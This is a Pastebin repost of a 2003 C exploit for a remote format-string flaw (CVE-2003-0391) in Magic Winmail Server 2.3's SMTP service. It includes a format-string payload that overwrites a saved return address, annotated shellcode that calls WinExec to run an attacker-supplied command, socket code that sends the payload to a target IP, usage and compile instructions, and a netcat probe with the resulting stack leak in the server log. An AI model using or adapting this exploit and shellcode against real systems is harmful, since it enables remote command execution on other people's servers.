Advertisement
FlyFar

Winmail Mail Server 2.3 Build 0402 - Remote Format String - CVE-2003-0391

Feb 2nd, 2024
1,175
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 6.39 KB | Cybersecurity | 0 0
  1. /******************************************************************
  2.  * Magic Winmail Server 2.3(Build 0402)
  3.  * Remote Format string exploit.
  4.  ******************************************************************
  5.  * Coded by ThreaT.
  6.  *
  7.  *
  8.  * This one take advantage of a format bug in the
  9.  * >>> SMTP protocol <<< (not pop3) for execute
  10.  * a malicious command on a vulnerable system
  11.  *
  12.  * usage : mwmxploit <Target IP> <command to execute remotely> [smtp port]
  13.  * + The command to execute cannot exceed 90 characters +
  14.  *
  15.  * compile : cl.exe mwmxploit.c /w
  16.  *
  17.  ******************************************************************
  18. */
  19.  
  20.  
  21. #include <windows.h>
  22. #include <winsock.h>
  23.  
  24. #pragma comment (lib,"wsock32.lib")
  25.  
  26. void main (int argc, char *argv[])
  27. {
  28.  
  29.     SOCKET sock;
  30.  
  31.     char buffer[1000];
  32.     int i;
  33.  
  34.     // ecrasement d'un saved EIP grâce aux caractères de format
  35.     char vuln[] =      
  36.         "\xec\xfc\x66\x01%x%x"
  37.         "\xed\xfc\x66\x01%x%x"
  38.         "\xee\xfc\x66\x01"
  39.        
  40.         "%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%28x%n"
  41.         "%97x%n%105x%hn"
  42.  
  43. /*
  44.  
  45.   This is my specific shellcode for execute a command
  46.   over the Magic Winmail process.
  47.  
  48.   This one can contain null bytes, enjoy ! :)
  49.  
  50. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  51. Disassembly of File: mailserver.exe
  52. Code Offset = 00001000, Code Size = 000CF000
  53. Data Offset = 000EC000, Data Size = 0002E000
  54. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  55.  Reference To: KERNEL32.GetModuleHandleA, Ord:0000h
  56. :004B8850 FF15AC014D00            Call dword ptr [004D01AC]
  57.  
  58.  Reference To: KERNEL32.ExitProcess, Ord:0000h
  59. :004B88C6 FF1598014D00            Call dword ptr [004D0198]
  60.  
  61.  Reference To: KERNEL32.GetProcAddress, Ord:0000h
  62. :00406CE7 8B3DEC004D00            mov edi, dword ptr [004D00EC]
  63. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  64.  
  65.   //////////////////////// My shellcode \\\\\\\\\\\\\\\\\\\\\\\\\\
  66.  
  67. : EB50                    jmp 00401058
  68. : 5E                      pop esi
  69. : 8BEC                    mov ebp, esp
  70. : 83EC28                  sub esp, 00000028     // je cree un stack
  71. : C745D84B65726E          mov [ebp-28], 6E72654B
  72. : C745DC656C3332          mov [ebp-24], 32336C65 // j'y place 'Kernel32'
  73. : C745E000000000          mov [ebp-20], 00000000
  74. : C745E457696E45          mov [ebp-1C], 456E6957
  75. : C745E878656300          mov [ebp-18], 00636578 // ici 'WinExec'
  76.  
  77. // adaptez le shellcode en virant cette ligne si vraiment vous avez besoin
  78. // de 4 caractères de plus pour la commande à executer
  79. : C645EB00                mov [ebp-15], 00
  80.                                        
  81. : BAAC014D00              mov edx, 004D01AC
  82. : 8D45D8                  lea eax, dword ptr [ebp-28]
  83. : 50                      push eax
  84. : FF12                    call dword ptr [edx]  // eax = GetModuleHandle ("Kernel32");
  85. : 8D5DE4                  lea ebx, dword ptr [ebp-1C]
  86. : 53                      push ebx
  87. : 50                      push eax
  88. : BAEC004D00              mov edx, 004D00EC
  89. : FF12                    call dword ptr [edx]  // GetProcAdress (eax, "WinExec");
  90. : 6A01                    push 00000001     // 1 = SW_SHOW, 0 = SW_HIDE
  91. : 56                      push esi
  92. : FFD0                    call eax          // WinExec (argv[2], SW_SHOW)
  93. : BA98014D00              mov edx, 004D0198
  94. : FF12                    call dword ptr [edx]  // ExitProcess ();
  95. : E8ABFFFFFF              call 00401008
  96.  
  97.   \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ EOF /////////////////////////////////
  98.  
  99.   */
  100.    
  101.  
  102. // Generated by Hex Workshop
  103. // shellcode.exe - Starting Offset: 4102 (0x00001006) Length: 87 (0x00000057)
  104.  
  105.     "\x00\x90\x90\x90\x90"  // sa, c'est pour bien coller
  106.     "\xEB\x50\x5E\x8B\xEC\x83\xEC\x28\xC7\x45\xD8\x4B\x65\x72\x6E\xC7"
  107.     "\x45\xDC\x65\x6C\x33\x32\xC7\x45\xE0\x00\x00\x00\x00\xC7\x45\xE4"
  108.     "\x57\x69\x6E\x45\xC7\x45\xE8\x78\x65\x63\x00\xC6\x45\xEB\x00\xBA"
  109.     "\xAC\x01\x4D\x00\x8D\x45\xD8\x50\xFF\x12\x8D\x5D\xE4\x53\x50\xBA"
  110.     "\xEC\x00\x4D\x00\xFF\x12\x6A\x01\x56\xFF\xD0\xBA\x98\x01\x4D\x00"
  111.     "\xFF\x12\xE8\xAB\xFF\xFF\xFF";
  112.  
  113.     SOCKADDR_IN sin;
  114.     WSADATA wsadata;
  115.     WORD wVersionRequested = MAKEWORD (2,0);
  116.  
  117.     //
  118.     printf ("* #################################### *\n"
  119.         "  Magic Winmail Server 2.3(Build 0402)\n"
  120.         "     Remote format string exploit !\n"
  121.         "* #################################### *\n"
  122.         "  Coded By ThreaT -> ThreaT\n\n");
  123.  
  124.     if (argc < 3 || strlen (argv[2]) > 90)
  125.     {
  126.     printf ("usage : mwmxploit <Target IP> <command to execute> [smtp port]\n\n"
  127.             " + The command to execute cannot exceed 90 characters +\n");
  128.     ExitProcess (0);
  129.     }
  130.  
  131.     if ( WSAStartup(wVersionRequested, &wsadata) )
  132.     {
  133.         printf ("Erreur d'initialisation winsock !\n");
  134.         ExitProcess (1);       
  135.     }
  136.  
  137.     sin.sin_family = AF_INET;
  138.     sin.sin_port = htons ((void *)argv[3] ? atoi (argv[3]) : 25);
  139.    
  140.     if ( (sin.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE)
  141.     {
  142.         printf ("Erreur : L'adresse IP de la victime est incorrect !\n");
  143.         ExitProcess (2);
  144.     }
  145.  
  146.     printf ("connecting to %s on port %u...", argv[1], ntohs ( sin.sin_port ) );
  147.  
  148.     sock = socket (AF_INET, SOCK_STREAM, 0);
  149.     if ( connect (sock, (SOCKADDR *)&sin, sizeof (sin)) )
  150.     {
  151.         printf ("erreur : connexion impossible !\n");
  152.         ExitProcess (3);
  153.     }
  154.  
  155.     recv (sock,buffer,1000,0);
  156.    
  157.     printf ("ok\n-> %s\nsending exploit code...",buffer);
  158.  
  159.     send (sock, vuln, strlen (vuln) + 92, 0);  // envoi du shellcode
  160.     send (sock, argv[2], strlen (argv[2]), 0); // envoi de la commande
  161.     send (sock, "\r\n", 2, 0); // validation
  162.  
  163.     recv (sock,buffer,1000,0); // remote crash :)
  164.  
  165.     puts ("ok");
  166. }
  167.  
  168. /*
  169. D:\toolz\netcat>nc 127.0.0.1 25
  170. 220 M1 Magic Winmail Server 2.3(Build 0402) ESMTP ready
  171. AAAA 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x
  172. 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.
  173. 8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x
  174. 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x
  175. 502 unimplemented (#5.5.1)
  176.  */
  177.  
  178. /*
  179. D:\>type "c:\Program Files\Magic Winmail\server\logs\smtp.log"
  180. 0906/Y-01:50:30   1548 Connect from 127.0.0.1
  181. 0906/Y-01:51:06   1584 unrecognized command = AAAA 0x00498f71 0x0176fd10
  182. 0x0176fe3c 0x000000eb 0x0176ff80 0x00ee6c80 0x00000050 0x00ee60d9 0x00000102
  183. 0x0000011f 0x00000050 0x00eecf71 0x0000001c 0x0000001f 0x0176ff74 0x004cd2c0
  184. 0x00000001 0x00493e40 0x0176fd50 0x00000000 0x00ee5ea8 0x00ee5ea8 0x41414141
  185. 0x25783020 0x2078382e 0x2e257830 0x30207838 0x382e2578 0x78302078 0x78382e25
  186. 0x25783020 0x2078382e 0x2e257830
  187.  
  188. */
  189.  
  190.  
  191. // milw0rm.com [2003-06-11]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement